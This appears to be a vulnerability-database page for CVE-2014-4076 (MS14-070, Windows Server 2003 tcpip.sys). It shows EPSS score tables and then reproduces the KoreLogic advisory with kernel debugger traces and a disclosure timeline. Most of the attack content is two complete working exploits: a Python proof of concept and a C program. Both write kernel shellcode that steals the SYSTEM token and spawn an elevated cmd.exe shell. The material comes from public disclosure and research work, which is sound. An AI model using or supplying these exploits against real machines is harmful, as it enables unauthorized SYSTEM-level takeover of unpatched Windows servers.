CVE-2014-4076 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.73%	–	–
2022-04-03	–	–	4.73%	–	–
2022-07-17	–	–	4.73%	–	–
2023-03-12	–	–	–	0.05%	–
2023-03-19	–	–	–	0.05%	–
2023-04-09	–	–	–	0.05%	–
2023-04-16	–	–	–	0.05%	–
2023-11-05	–	–	–	0.05%	–
2023-11-12	–	–	–	0.05%	–
2024-03-31	–	–	–	0.05%	–
2024-06-02	–	–	–	0.05%	–
2024-06-09	–	–	–	0.05%	–
2024-08-25	–	–	–	0.05%	–
2024-09-15	–	–	–	0.05%	–
2024-12-15	–	–	–	0.05%	–
2025-01-12	–	–	–	0.05%	–
2025-01-19	–	–	–	0.05%	–
2025-03-18	–	–	–	–	38.51%
2025-03-30	–	–	–	–	44.59%
2025-04-06	–	–	–	–	50.9%
2025-04-22	–	–	–	–	51.15%
2025-04-22	–	–	–	–	51.15,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	75%
2022-04-03	88%
2022-07-17	89%
2023-03-12	18%
2023-03-19	17%
2023-04-09	18%
2023-04-16	17%
2023-11-05	18%
2023-11-12	17%
2024-03-31	18%
2024-06-02	19%
2024-06-09	2%
2024-08-25	2%
2024-09-15	21%
2024-12-15	22%
2025-01-12	23%
2025-01-19	23%
2025-03-18	97%
2025-03-30	97%
2025-04-06	98%
2025-04-22	98%
2025-04-22	98%

""" KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-001 Publication Date: 2015.01.28 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: TCP/IP Protocol Driver Affected Version: 5.2.3790.4573 Platform: Microsoft Windows Server 2003 Service Pack 2 Architecture: x86, x64, Itanium Impact: Privilege Escalation Attack vector: IOCTL CVE-ID: CVE-2014-4076 2. Vulnerability Description The tcpip.sys driver fails to sufficiently validate memory objects used during the processing of a user-provided IOCTL. 3. Technical Description By crafting an input buffer that will be passed to the Tcp device through the NtDeviceIoControlFile() function, it is possible to trigger a vulnerability that would allow an attacker to elevate privileges. This vulnerability was discovered while fuzzing the tcpip.sys driver. A collection of IOCTLs that could be targeted was obtained and subsequently fuzzed. During this process, one of the crashes obtained originated from the IOCTL 0x00120028. This was performed on an x86 installation of Windows Server 2003, Service Pack 2. ErrCode = 00000000 eax=00000000 ebx=859ef888 ecx=00000008 edx=00000100 esi=00000000 edi=80a58270 eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 tcpip!SetAddrOptions+0x1d: f67ebbbd 8b5e28 mov ebx,dword ptr [esi+28h] ds:0023:00000028=???????? A second chance exception has occurred during a mov instruction. This instruction is attempting to copy a pointer value from an un-allocated address space. Since no pointer can be found, an exception is generated. Let's begin by reviewing the call stack: kd> kv *** Stack trace for last set context - .thread/.cxr resets it ChildEBP RetAddr Args to Child f620a9dc f67e416b f620aa34 00000022 00000004 tcpip!SetAddrOptions+0x1d (FPO: [Non-Fpo]) f620aa10 f67e40de f620aa34 859ef888 859ef8a0 tcpip!TdiSetInformationEx+0x539 (FPO: [Non-Fpo]) f620aa44 f67e3b24 85a733d0 85a73440 85a73440 tcpip!TCPSetInformationEx+0x8c (FPO: [Non-Fpo]) f620aa60 f67e3b51 85a733d0 85a73440 85a733d0 tcpip!TCPDispatchDeviceControl+0x149 (FPO: [Non-Fpo]) f620aa98 8081d7d3 85c4b410 85a733d0 85e82390 tcpip!TCPDispatch+0xf9 (FPO: [Non-Fpo]) f620aaac 808ef85d 85a73440 85e82390 85a733d0 nt!IofCallDriver+0x45 (FPO: [Non-Fpo]) f620aac0 808f05ff 85c4b410 85a733d0 85e82390 nt!IopSynchronousServiceTail+0x10b (FPO: [Non-Fpo]) f620ab5c 808e912e 000006f4 00000000 00000000 nt!IopXxxControlFile+0x5e5 (FPO: [Non-Fpo]) f620ab90 f55c10fa 000006f4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a (FPO: [Non-Fpo]) The nt!NtDeviceIoControlFile() function was called, creating a chain of subsequent function calls that eventually led to the tcpip!SetAddrOptions() function being called. By de-constructing the call to nt!NtDeviceIoControlFile() we can derive all required information to re-create this exception. 0a b940dd34 80885614 nt!NtDeviceIoControlFile+0x2a eax=00000000 ebx=8c785070 ecx=00000000 edx=00000000 esi=00000000 edi=00000000 eip=808e912e esp=b940dd08 ebp=b940dd34 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 nt!NtDeviceIoControlFile+0x2a: 808e912e 5d pop ebp kd> db [ebp+2C] L?0x4 b940dd60 00 00 00 00 .... kd> db [ebp+28] L?0x4 b940dd5c 00 00 00 00 .... kd> db [ebp+24] L?0x4 b940dd58 20 00 00 00 ... kd> db [ebp+20] L?0x4 b940dd54 00 11 00 00 .... kd> db [ebp+1c] L?0x4 b940dd50 28 00 12 00 (... kd> db [ebp+18] L?0x4 b940dd4c 58 4f bd 00 XO.. kd> db [ebp+14] L?0x4 b940dd48 00 00 00 00 .... kd> db [ebp+10] L?0x4 b940dd44 00 00 00 00 .... kd> db [ebp+0c] L?0x4 b940dd40 00 00 00 00 .... kd> db [ebp+8] L?0x4 b940dd3c b8 06 00 00 .... The inputBuffer for this call references memory at 0x1000 with a length of 0x20. kd> db 0x1100 L?0x20 00001100 00 04 00 00 00 00 00 00-00 02 00 00 00 02 00 00 ................ 00001110 22 00 00 00 04 00 00 00-00 00 01 00 00 00 00 00 "............... After review of the tcpip.sys driver, some memory trickery was created to control the code flow until the instruction pointer could be controlled in a way that would be beneficial to an attacker. kd> db 0x28 L?0x11 00000028 87 ff ff 38 00 00 00 00-00 00 00 00 00 00 00 00 ...8............ 00000038 01 eax=00000000 ebx=80a58290 ecx=00000000 edx=00000000 esi=00000000 edi=00000000 eip=0000002a esp=b940db3c ebp=b940db60 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 0000002a ff ??? Since the instruction pointer now contains 0x0000002a, exploitation becomes trivial. Merely allocating the desired payload for execution at this memory address will allow for unprivileged users to run their payload within a privileged process. 4. Mitigation and Remediation Recommendation The vendor has issued a patch for this vulnerability, the details of which are presented in the vendor's public acknowledgment MS14-070 (https://technet.microsoft.com/library/security/MS14-070). 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.04.28 - Initial contact; sent Microsoft report and PoC. 2014.04.28 - Microsoft requests PoC. 2014.04.29 - KoreLogic resends PoC from the initial contact email. 2014.04.29 - Microsoft acknowledges receipt of vulnerability report. 2014.04.29 - Microsoft opens case 19010 (MSRC 0050929) to investigate the vulnerability. 2014.04.30 - Microsoft informs KoreLogic that the case is actively being investigated. 2014.05.30 - Microsoft informs KoreLogic that the case is actively being investigated. 2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgment of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.24 - KoreLogic informs Microsoft that no response was received following the 06.11.14 email. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.24 - Microsoft replies to KoreLogic that they have reproduced the vulnerability and are determining how to proceed with the supplied information. They are not able to provide a CVE or an expected disclosure date. 2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC. 2014.07.17 - KoreLogic requests CVE number for the vulnerability. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.08.18 - Microsoft notifies KoreLogic that they have a CVE but are not willing to share it with KoreLogic at this time. 2014.09.08 - KoreLogic requests CVE number for the vulnerability. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.09.11 - Microsoft responds saying that the vulnerability is expected to be disclosed in "a Fall release" and that "it is currently looking good for October." Does not provide CVE. 2014.09.24 - Microsoft informs KoreLogic that there was a packaging issue and that the patch will be pushed to November. 2014.11.03 - Microsoft confirms the patch will ship in November. 2014.11.11 - Vulnerability publicly disclosed by Microsoft as issue MS14-070 with CVE-2014-4076. 2015.01.28 - KoreLogic releases advisory. 7. Exploit """ #!/usr/bin/python2 # # KL-001-2015-001 / MS14-070 / CVE-2014-4076 # Microsoft Windows Server 2003 x86 Tcpip.sys Privilege Escalation # Matt Bergin @ KoreLogic / Level @ Smash the Stack # shout out to bla # from optparse import OptionParser from subprocess import Popen from os.path import exists from struct import pack from time import sleep from ctypes import * from sys import exit CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory = windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory DeviceIoControlFile,CloseHandle = windll.ntdll.ZwDeviceIoControlFile,windll.kernel32.CloseHandle INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 def spawn_process(path): process = Popen([path],shell=True) pid = process.pid return def main(): print "CVE-2014-4076 x86 exploit, Level\n" global pid, process parser = OptionParser() parser.add_option("--path",dest="path",help="path of process to start and elevate") parser.add_option("--pid",dest="pid",help="pid of running process to elevate") o,a = parser.parse_args() if (o.path == None and o.pid == None): print "[!] no path or pid set" exit(1) else: if (o.path != None): if (exists(o.path) != True): print "[!] path does not exist" exit(1) else: Thread(target=spawn_process,args=(o.path),name='attacker-cmd').start() if (o.pid != None): try: pid = int(o.pid) except: print "[!] could not convert PID to an interger." exit(1) while True: if ("pid" not in globals()): sleep(1) else: print "[+] caught attacker cmd at %s, elevating now" % (pid) break buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00" sc = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00" sc = sc.replace("\x41\x41\x41\x41",pack('<L',pid)) sc = sc.replace("\x11\x11\x11\x11","\x39\xff\xa2\xba") sc = sc.replace("\x22\x22\x22\x22","\x00\x00\x00\x00") handle = CreateFileA("\\\\.\\Tcp",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == -1): print "[!] could not open handle into the Tcp device" exit(1) print "[+] allocating memory" ret_one = NtAllocateVirtualMemory(-1,byref(c_int(0x1000)),0x0,byref(c_int(0x4000)),0x1000|0x2000,0x40) if (ret_one != 0): print "[!] could not allocate memory..." exit(1) print "[+] writing relevant memory..." ret_two = WriteProcessMemory(-1, 0x28, "\x87\xff\xff\x38", 4, byref(c_int(0))) ret_three = WriteProcessMemory(-1, 0x38, "\x00"*2, 2, byref(c_int(0))) ret_four = WriteProcessMemory(-1, 0x1100, buf, len(buf), byref(c_int(0))) ret_five = WriteProcessMemory(-1, 0x2b, "\x00"*2, 2, byref(c_int(0))) ret_six = WriteProcessMemory(-1, 0x2000, sc, len(sc), byref(c_int(0))) print "[+] attack setup done, crane kick!" DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x00120028,0x1100,len(buf),0x0,0x0) CloseHandle(handle) exit(0) if __name__=="__main__": main() """ The contents of this advisory are copyright(c) 2015 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt """

/* ################################################################ # Exploit Title: Windows 2k3 SP2 TCP/IP IOCTL Privilege Escalation (MS14-070) # Date: 2015-08-10 # Exploit Author: Tomislav Paskalev # Vulnerable Software: # Windows 2003 SP2 x86 # Windows 2003 SP2 x86-64 # Windows 2003 SP2 IA-64 # Supported vulnerable software: # Windows 2003 SP2 x86 # Tested on: # Windows 2003 SP2 x86 EN # CVE ID: 2014-4076 # OSVDB-ID: 114532 ################################################################ # Vulnerability description: # Windows TCP/IP stack (tcpip.sys, tcpip6.sys) fails to # properly handle objects in memory during IOCTL processing. # By crafting an input buffer that will be passed to the TCP # device through the DeviceIoControlFile() function, it is # possible to trigger a vulnerability that would allow an # attacker to elevate privileges. # An attacker who successfully exploited this vulnerability # could run arbitrary code in kernel mode (i.e. with SYSTEM # privileges). ################################################################ # Exploit notes: # Privileged shell execution: # - the SYSTEM shell will spawn within the existing shell # (i.e. exploit usable via a remote shell) # - upon exiting the SYSTEM shell, the parent process # will become unresponsive/hang # Exploit compiling: # - # i586-mingw32msvc-gcc MS14-070.c -o MS14-070.exe # Exploit prerequisites: # - low privilege access to the target (remote shell or RDP) # - target not patched (KB2989935 not installed) ################################################################ # Patch: # https://www.microsoft.com/en-us/download/details.aspx?id=44646 ################################################################ # Thanks to: # KoreLogic (Python PoC) # ChiChou (C++ PoC) ################################################################ # References: # http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4076 # https://technet.microsoft.com/library/security/ms14-070 # https://www.exploit-db.com/exploits/35936/ # https://github.com/ChiChou/CVE-2014-4076/blob/master/CVE-2014-4076/CVE-2014-4076.cpp # https://www.osronline.com/article.cfm?article=229 ################################################################ */ #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation = 0, SystemPerformanceInformation = 2, SystemTimeOfDayInformation = 3, SystemProcessInformation = 5, SystemProcessorPerformanceInformation = 8, SystemInterruptInformation = 23, SystemExceptionInformation = 33, SystemRegistryQuotaInformation = 37, SystemLookasideInformation = 45 } SYSTEM_INFORMATION_CLASS; typedef DWORD NTSTATUS; NTSTATUS WINAPI NtQuerySystemInformation ( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); typedef struct _IO_STATUS_BLOCK { union { NTSTATUS Status; PVOID Pointer; }; ULONG_PTR Information; } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; typedef void (WINAPI * PIO_APC_ROUTINE) (PVOID, PIO_STATUS_BLOCK, ULONG); NTSTATUS (WINAPI *ZwAllocateVirtualMemory) ( HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect ); NTSTATUS (WINAPI *ZwDeviceIoControlFile) ( HANDLE FileHandle, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, ULONG IoControlCode, PVOID InputBuffer, ULONG InputBufferLength, PVOID OutputBuffer, ULONG OutputBufferLength ); BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation) { ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO)); startupInformation->cb = sizeof (STARTUPINFO); ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION)); // Start the child process. return CreateProcess ( NULL, // No module name (use command line) "c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32", // Start cmd.exe NULL, // Process handle not inheritable NULL, // Thread handle not inheritable TRUE, // Set handle inheritance to TRUE 0, // No creation flags NULL, // Use parent's environment block NULL, // Use parent's starting directory &startupInformation[0], // Pointer to STARTUPINFO structure &processInformation[0] // Pointer to PROCESS_INFORMATION structure ); } unsigned long SwapBytes (unsigned long inputByteUL) { return (((inputByteUL&0x000000FF) << 24) + ((inputByteUL&0x0000FF00) << 8) + ((inputByteUL&0x00FF0000) >> 8) + ((inputByteUL&0xFF000000) >> 24)); } BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode) { int returnAllocMemValue1, returnAllocMemValue2, returnAllocMemValue3, returnAllocMemValue4, returnAllocMemValue5; returnAllocMemValue1 = WriteProcessMemory ( (HANDLE) 0xFFFFFFFF, (LPVOID) 0x28, "\x87\xff\xff\x38", 4, NULL ); returnAllocMemValue2 = WriteProcessMemory ( (HANDLE) 0xFFFFFFFF, (LPVOID) 0x38, "\x00\x00", 2, NULL ); returnAllocMemValue3 = WriteProcessMemory ( (HANDLE) 0xFFFFFFFF, (LPVOID) 0x1100, &exploitBuffer[0], 32, NULL ); returnAllocMemValue4 = WriteProcessMemory ( (HANDLE) 0xFFFFFFFF, (LPVOID) 0x2b, "\x00\x00", 2, NULL ); returnAllocMemValue5 = WriteProcessMemory ( (HANDLE) 0xFFFFFFFF, (LPVOID) 0x2000, &shellcode[0], 96, NULL ); if (returnAllocMemValue1 == 0 || returnAllocMemValue2 == 0 || returnAllocMemValue3 == 0 || returnAllocMemValue4 == 0 || returnAllocMemValue5 == 0) return FALSE; else return TRUE; } int main (void) { fprintf (stderr, "[*] MS14-070 (CVE-2014-4076) x86\n"); fprintf (stderr, " [*] by Tomislav Paskalev\n"); fflush (stderr); //////////////////////////////// // CREATE NEW CME.EXE PROCESS //////////////////////////////// STARTUPINFO *startupInformation = (STARTUPINFO *) malloc (sizeof (STARTUPINFO)); PROCESS_INFORMATION *processInformation = (PROCESS_INFORMATION *) malloc (sizeof (PROCESS_INFORMATION)); if (!CreateNewCmdProcess (&startupInformation[0], &processInformation[0])) { fprintf (stderr, "[-] Creating a new process failed\n"); fprintf (stderr, " [*] Error code : %d\n", GetLastError()); fflush (stderr); ExitProcess (1); } fprintf (stderr, "[+] Created a new cmd.exe process\n"); fflush (stderr); //////////////////////////////// // CONVERT PID TO HEX LE //////////////////////////////// unsigned long pidLittleEndian = SwapBytes ((unsigned long) processInformation->dwProcessId); fprintf (stderr, " [*] PID [dec] : %#8lu\n", (unsigned long) processInformation->dwProcessId); fprintf (stderr, " [*] PID [hex] : %#010x\n", (unsigned long) processInformation->dwProcessId); fprintf (stderr, " [*] PID [hex LE] : %#010x\n", pidLittleEndian); /*four bytes of hex = 8 characters, plus NULL terminator*/ unsigned char pidLittleEndianString[9]; sprintf (&pidLittleEndianString[0], "%04x", pidLittleEndian); //////////////////////////////// // CREATE SHELLCODE //////////////////////////////// unsigned char exploitBuffer[] = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00" "\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"; unsigned char shellcode[] = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00" "\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00" "\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41" "\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94" "\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11" "\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00"; int counter; for (counter = 0; counter < 4; counter++) { char buffer[3] = {pidLittleEndianString[counter * 2], pidLittleEndianString[(counter * 2) + 1], 0}; shellcode[46 + counter] = strtol (buffer, NULL, 16); } shellcode[77] = strtol ("39", NULL, 16); shellcode[78] = strtol ("ff", NULL, 16); shellcode[79] = strtol ("a2", NULL, 16); shellcode[80] = strtol ("ba", NULL, 16); shellcode[82] = strtol ("0", NULL, 16); shellcode[83] = strtol ("0", NULL, 16); shellcode[84] = strtol ("0", NULL, 16); shellcode[85] = strtol ("0", NULL, 16); fprintf (stderr, "[+] Modified shellcode\n"); fflush (stderr); //////////////////////////////// // CREATE HANDLE ON TCPIP.SYS //////////////////////////////// HANDLE tcpIPDeviceHandle = CreateFileA ( "\\\\.\\Tcp", 0, 0, NULL, OPEN_EXISTING, 0, NULL ); if (tcpIPDeviceHandle == INVALID_HANDLE_VALUE) { printf ("[-] Opening TCP/IP I/O dev failed\n"); printf (" [*] Error code : %d\n", GetLastError()); ExitProcess (1); } fprintf (stderr, "[+] Opened TCP/IP I/O device\n"); fflush (stderr); //////////////////////////////// // ALLOCATE MEMORY - FIRST PAGE //////////////////////////////// FARPROC ZwAllocateVirtualMemory; ZwAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwAllocateVirtualMemory"); fprintf (stderr, "[*] ntdll.dll address: 0x%p\n", ZwAllocateVirtualMemory); fflush (stderr); NTSTATUS AllocMemReturnCode; ULONG BaseAddress = 0x1000, RegionSize = 0x4000; AllocMemReturnCode = ZwAllocateVirtualMemory ( (HANDLE) 0xFFFFFFFF, &BaseAddress, 0, &RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); if (AllocMemReturnCode != 0) { printf ("[-] Allocating memory failed\n"); printf (" [*] Error code : %#X\n", AllocMemReturnCode); ExitProcess (1); } fprintf (stderr, "[+] Allocated memory\n"); fprintf (stderr, " [*] BaseAddress : 0x%p\n", BaseAddress); fprintf (stderr, " [*] RegionSize : %#010x\n", RegionSize); fflush (stderr); //////////////////////////////// // WRITE EXPLOIT TO PROCESS MEM //////////////////////////////// fprintf (stderr, "[*] Writing exploit...\n"); fflush (stderr); if (!WriteToAllocMem (&exploitBuffer[0], &shellcode[0])) { fprintf (stderr, " [-] Failed to write to memory\n"); fprintf (stderr, " [*] Err code : %d\n", GetLastError ()); fflush (stderr); ExitProcess (1); } else { fprintf (stderr, " [+] done\n"); fflush (stderr); } //////////////////////////////// // SEND EXPLOIT TO TCPIP.SYS //////////////////////////////// fprintf (stderr, "[*] Spawning SYSTEM shell...\n"); fprintf (stderr, " [*] Parent proc hangs on exit\n"); fflush (stderr); FARPROC ZwDeviceIoControlFile; NTSTATUS DevIoCtrlReturnCode; ULONG ioStatus = 8; ZwDeviceIoControlFile = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwDeviceIoControlFile"); DevIoCtrlReturnCode = ZwDeviceIoControlFile ( tcpIPDeviceHandle, NULL, NULL, NULL, (PIO_STATUS_BLOCK) &ioStatus, 0x00120028, //Device: NETWORK (0x12) //Function: 0xa //Access: FILE_ANY_ACCESS //Method: METHOD_BUFFERED (PVOID) 0x1100, //NULL, //Test 32, //0, //Test NULL, 0 ); if (DevIoCtrlReturnCode != 0) { fprintf (stderr, " [-] Exploit failed (->TCP/IP)\n"); fprintf (stderr, " [*] Err code : %d\n", GetLastError ()); fflush (stderr); ExitProcess (1); } //////////////////////////////// // WAIT FOR CHILD PROCESS; EXIT //////////////////////////////// // Wait until child process exits. WaitForSingleObject (processInformation->hProcess, INFINITE); fprintf (stderr, "[*] Exiting SYSTEM shell...\n"); fflush (stderr); // Close process and thread handles. CloseHandle (tcpIPDeviceHandle); CloseHandle (processInformation->hProcess); CloseHandle (processInformation->hThread); return 1; }